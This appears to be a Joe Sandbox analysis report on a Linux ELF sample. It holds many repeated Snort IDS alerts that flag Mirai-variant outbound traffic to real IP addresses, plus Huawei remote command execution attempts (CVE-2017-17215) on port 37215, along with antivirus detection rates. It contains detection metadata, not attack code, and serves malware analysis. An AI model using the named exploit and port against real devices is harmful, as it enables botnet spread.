    Timestamp:04/14/24-16:37:02.437787
    SID:2839471
    Source Port:38546
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:46.916379
    SID:2839471
    Source Port:59920
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:05.559913
    SID:2839471
    Source Port:57756
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:18.432008
    SID:2839471
    Source Port:52918
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:46.912715
    SID:2839471
    Source Port:41064
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:38.468439
    SID:2839471
    Source Port:52416
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:19.581870
    SID:2839471
    Source Port:56700
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:31.658937
    SID:2839471
    Source Port:53536
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:12.490109
    SID:2839471
    Source Port:49944
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:38.691757
    SID:2839471
    Source Port:58658
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:34:56.708580
    SID:2839471
    Source Port:53478
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:34:56.832499
    SID:2839471
    Source Port:46540
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:15.543523
    SID:2839471
    Source Port:52452
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:11.768190
    SID:2839471
    Source Port:60930
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:54.500970
    SID:2839471
    Source Port:59880
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:23.012227
    SID:2839471
    Source Port:37620
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:26.242737
    SID:2839471
    Source Port:51134
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:17.588424
    SID:2839471
    Source Port:33912
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:04.801632
    SID:2839471
    Source Port:41550
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:47.395728
    SID:2839471
    Source Port:58422
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:30.529706
    SID:2839471
    Source Port:53492
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:02.088551
    SID:2839471
    Source Port:53640
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:14.484943
    SID:2839471
    Source Port:47954
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:19.556296
    SID:2839471
    Source Port:50224
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:46.922260
    SID:2839471
    Source Port:53830
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:07.712605
    SID:2839471
    Source Port:58506
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:15.406871
    SID:2839471
    Source Port:36554
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:09.891201
    SID:2839471
    Source Port:44142
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:34:56.979967
    SID:2839471
    Source Port:49606
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:47.556387
    SID:2839471
    Source Port:38742
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:08.316936
    SID:2839471
    Source Port:50536
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:34:56.711070
    SID:2839471
    Source Port:33774
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:21.547291
    SID:2839471
    Source Port:48278
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:37.823905
    SID:2839471
    Source Port:58966
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:56.428798
    SID:2839471
    Source Port:59908
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:12.851999
    SID:2839471
    Source Port:33546
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:24.169099
    SID:2839471
    Source Port:38732
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:34:56.792642
    SID:2839471
    Source Port:55918
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:15.517626
    SID:2839471
    Source Port:51994
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:45.845041
    SID:2839471
    Source Port:41008
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:04.197916
    SID:2839471
    Source Port:48178
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:11.489820
    SID:2839471
    Source Port:36994
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:15.809783
    SID:2839471
    Source Port:44726
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:30.428937
    SID:2839471
    Source Port:36846
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:13.412719
    SID:2839471
    Source Port:42230
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:00.385126
    SID:2839471
    Source Port:54104
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:33.075366
    SID:2839471
    Source Port:48170
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:11.454597
    SID:2839471
    Source Port:39108
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:21.288125
    SID:2839471
    Source Port:54086
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:18.587728
    SID:2839471
    Source Port:44166
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:03.644546
    SID:2839471
    Source Port:44526
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:18.556630
    SID:2839471
    Source Port:57110
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:34:56.688374
    SID:2839471
    Source Port:59852
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:04.036929
    SID:2839471
    Source Port:59932
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:38.055618
    SID:2839471
    Source Port:39100
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:04.285396
    SID:2839471
    Source Port:38286
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:04.271328
    SID:2839471
    Source Port:59180
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:38.477948
    SID:2839471
    Source Port:43148
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:45.910221
    SID:2839471
    Source Port:53178
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:45.274637
    SID:2839471
    Source Port:35944
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:19.258119
    SID:2839471
    Source Port:49810
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:54.405540
    SID:2839471
    Source Port:57322
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:15.549022
    SID:2839471
    Source Port:44802
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:44.839885
    SID:2839471
    Source Port:44276
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:31.607715
    SID:2839471
    Source Port:43426
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:32.329949
    SID:2839471
    Source Port:54016
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:07.249524
    SID:2839471
    Source Port:56648
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:42.134304
    SID:2839471
    Source Port:37162
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:35.292630
    SID:2839471
    Source Port:48648
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:24.159046
    SID:2839471
    Source Port:40186
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:15.520606
    SID:2839471
    Source Port:60038
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:22.374842
    SID:2839471
    Source Port:50308
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:42.159840
    SID:2839471
    Source Port:47302
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:24.164343
    SID:2839471
    Source Port:57832
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:38.896313
    SID:2839471
    Source Port:52550
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:18.079284
    SID:2839471
    Source Port:56154
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:42.153978
    SID:2839471
    Source Port:53534
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:11.607252
    SID:2839471
    Source Port:46726
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:19.544887
    SID:2839471
    Source Port:42918
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:20.637946
    SID:2839471
    Source Port:34166
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:02.060063
    SID:2839471
    Source Port:60964
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:03.678390
    SID:2839471
    Source Port:38940
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:05.562797
    SID:2839471
    Source Port:57614
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:09.902958
    SID:2839471
    Source Port:43946
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:32.329710
    SID:2839471
    Source Port:53378
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:53.656557
    SID:2839471
    Source Port:33310
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:11.461774
    SID:2839471
    Source Port:37388
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:13.826777
    SID:2839471
    Source Port:52824
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:10.908446
    SID:2839471
    Source Port:51086
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:56.198360
    SID:2839471
    Source Port:51302
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:53.566214
    SID:2839471
    Source Port:44960
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:07.168775
    SID:2839471
    Source Port:50478
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:20.579513
    SID:2839471
    Source Port:38688
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:21.598551
    SID:2839471
    Source Port:59366
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:58.816341
    SID:2839471
    Source Port:59814
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:15.846198
    SID:2839471
    Source Port:48170
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:38.078777
    SID:2839471
    Source Port:55184
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:22.339591
    SID:2839471
    Source Port:36332
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:21.245021
    SID:2839471
    Source Port:55594
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:06.971437
    SID:2839471
    Source Port:59690
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:12.142680
    SID:2839471
    Source Port:45180
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:22.346940
    SID:2839471
    Source Port:34282
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:31.450189
    SID:2839471
    Source Port:59526
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:24.618422
    SID:2839471
    Source Port:42488
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:11.785308
    SID:2839471
    Source Port:58508
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:10.479080
    SID:2839471
    Source Port:40288
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:29.804648
    SID:2839471
    Source Port:50456
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:45.296026
    SID:2839471
    Source Port:57872
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:58.128685
    SID:2839471
    Source Port:55374
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:45.536225
    SID:2839471
    Source Port:55812
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:30.526950
    SID:2839471
    Source Port:49464
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:29.066293
    SID:2839471
    Source Port:41610
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:18.247931
    SID:2835222
    Source Port:33276
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/14/24-16:35:44.884346
    SID:2839471
    Source Port:55076
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:57.338114
    SID:2839471
    Source Port:53404
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:35.690443
    SID:2839471
    Source Port:44384
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:33.509589
    SID:2839471
    Source Port:43246
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:04.533458
    SID:2839471
    Source Port:37146
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:02.382338
    SID:2839471
    Source Port:53486
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:53.844790
    SID:2839471
    Source Port:55676
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:31.632576
    SID:2839471
    Source Port:53514
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:37.198000
    SID:2839471
    Source Port:36820
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:35.252842
    SID:2839471
    Source Port:41482
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:20.054295
    SID:2839471
    Source Port:37930
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:53.566043
    SID:2839471
    Source Port:37924
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:16.931141
    SID:2839471
    Source Port:50868
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:07.612449
    SID:2839471
    Source Port:58500
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:18.403550
    SID:2839471
    Source Port:47394
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:03.995322
    SID:2839471
    Source Port:47988
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:02.087953
    SID:2839471
    Source Port:48544
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:34:54.088769
    SID:2839471
    Source Port:46200
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:54.368303
    SID:2839471
    Source Port:59672
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:16.955656
    SID:2839471
    Source Port:51628
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:22.506584
    SID:2839471
    Source Port:49546
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:35.259793
    SID:2839471
    Source Port:39580
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:57.083455
    SID:2839471
    Source Port:56340
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:18.402523
    SID:2839471
    Source Port:33184
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:11.635997
    SID:2839471
    Source Port:59674
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:07.613900
    SID:2839471
    Source Port:58496
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:41.769484
    SID:2839471
    Source Port:44324
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:30.587358
    SID:2839471
    Source Port:42834
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:21.263579
    SID:2839471
    Source Port:46302
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:35.264361
    SID:2839471
    Source Port:58462
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:56.506902
    SID:2839471
    Source Port:58982
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:44.857837
    SID:2839471
    Source Port:44272
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:26.247241
    SID:2839471
    Source Port:43024
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:47.464750
    SID:2839471
    Source Port:50604
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:41.825730
    SID:2839471
    Source Port:46108
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:50.332643
    SID:2835222
    Source Port:33108
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/14/24-16:37:07.972286
    SID:2839471
    Source Port:34702
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:15.075693
    SID:2839471
    Source Port:59084
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:06.593822
    SID:2839471
    Source Port:43950
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:13.451338
    SID:2839471
    Source Port:52814
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:38.078271
    SID:2839471
    Source Port:38814
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: HfuP5Csj29.elfAvira: detected
    Multi AV Scanner detection for submitted file
    Source: HfuP5Csj29.elfReversingLabs: Detection: 65%
    Source: HfuP5Csj29.elfVirustotal: Detection: 67%Perma Link
    Source: unknownHTTPS traffic detected: 54.171.230.55:443 -> 192.168.2.23:33606 version: TLS 1.2

    Networking

    barindex
    Snort IDS alert for network traffic
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46200 -> 112.175.21.77:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51090 -> 112.168.155.32:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59852 -> 95.170.74.150:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53478 -> 95.216.100.196:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33774 -> 95.216.232.251:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39212 -> 95.101.114.42:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55918 -> 95.57.209.236:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49606 -> 112.181.148.65:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46540 -> 95.100.31.195:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49420 -> 112.124.186.161:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44526 -> 95.217.161.65:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59774 -> 95.101.21.12:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47988 -> 95.163.56.170:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59180 -> 88.208.0.187:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57406 -> 88.153.60.68:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42044 -> 95.239.77.161:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35472 -> 88.112.224.190:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40582 -> 88.99.32.152:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59690 -> 88.193.137.173:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57664 -> 88.147.6.252:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56648 -> 112.164.97.181:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44640 -> 95.217.161.65:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58500 -> 112.92.61.28:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58496 -> 112.92.61.28:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58506 -> 112.92.61.28:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56954 -> 112.196.108.163:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39108 -> 95.217.132.155:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37388 -> 88.218.206.8:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36994 -> 95.86.114.99:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60930 -> 95.168.217.15:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58508 -> 95.217.50.72:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47932 -> 95.249.99.66:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33510 -> 95.100.128.96:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45180 -> 95.156.103.114:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50616 -> 95.56.128.52:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49944 -> 112.30.175.107:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33546 -> 95.100.128.96:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40370 -> 95.216.146.164:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51994 -> 95.216.59.112:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60038 -> 95.217.188.3:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54002 -> 95.86.76.69:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52452 -> 95.10.12.103:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44802 -> 95.86.70.250:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44726 -> 88.150.141.50:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57910 -> 95.101.221.109:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48922 -> 112.216.25.60:80
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33276 -> 41.42.21.212:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33276 -> 41.42.21.212:37215
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56154 -> 112.83.136.45:80
